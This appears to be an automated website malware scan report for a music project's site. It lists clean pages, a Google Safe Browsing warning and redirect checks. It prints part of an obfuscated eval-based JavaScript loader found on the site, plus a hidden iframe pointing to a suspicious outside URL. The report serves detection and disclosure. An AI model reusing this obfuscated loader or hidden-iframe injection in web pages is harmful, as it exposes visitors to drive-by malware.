Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=darksoulproject.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.darksoulproject.com/ | 200 OK Content-Length: 3638 Content-Type: text/html | clean |
http://www.darksoulproject.com/media/jui/js/jquery.min.js | 200 OK Content-Length: 96381 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/media/jui/js/jquery-noconflict.js | 200 OK Content-Length: 21 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/media/jui/js/jquery-migrate.min.js | 200 OK Content-Length: 7199 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/media/system/js/tabs-state.js | 200 OK Content-Length: 1829 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/media/system/js/caption.js | 200 OK Content-Length: 501 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/media/jui/js/bootstrap.min.js | 200 OK Content-Length: 29156 Content-Type: application/x-javascript | clean |
http://www.darksoulproject.com/index.php/biography | 200 OK Content-Length: 4820 Content-Type: text/html | clean |
http://www.darksoulproject.com/index.php/discography | 200 OK Content-Length: 4737 Content-Type: text/html | clean |
http://www.darksoulproject.com/test404page.js | 404 Not Found Content-Length: 8087 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bdygi="y";xfqct="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[xfqct].getElementById("asd"))}()}catch(bpm){nkn=function(adfjco){adfjco="fro"+adfjco;for(yiq=0;yiq<bdygi.length;yiq++){tdglct+=String[adfjco](puphz(qlnnp+(bdygi[yiq]))-(35));}};};puphz=(window.eval);qlnnp="0x";kcpt=0;if(!kcpt){try{++puphz(xfqct)["\x62o"+"d"+bdygi]}catch(bpm){uftsx="^";}bdygi="43^89^98^91^86^97^8c^92^91^43^90^93^98^53^5c^4b^4c^43^9e^30^2d^43^99^84^95^43^ ...[4205 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 10x10 style: hidden src: http://radiodisney.clientes.ananke.com.br/counter.php This URL is marked by Google as suspicious <iframe src="http://radiodisney.clientes.ananke.com.br/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: darksoulproject.com
Result:
GET / HTTP/1.1
Host: darksoulproject.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: darksoulproject.com
Referer: http://www.google.com/search?q=darksoulproject.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: darksoulproject.com
Referer: http://www.google.com/search?q=darksoulproject.com
Result:
The result is similar to the first query. There are no suspicious redirects found.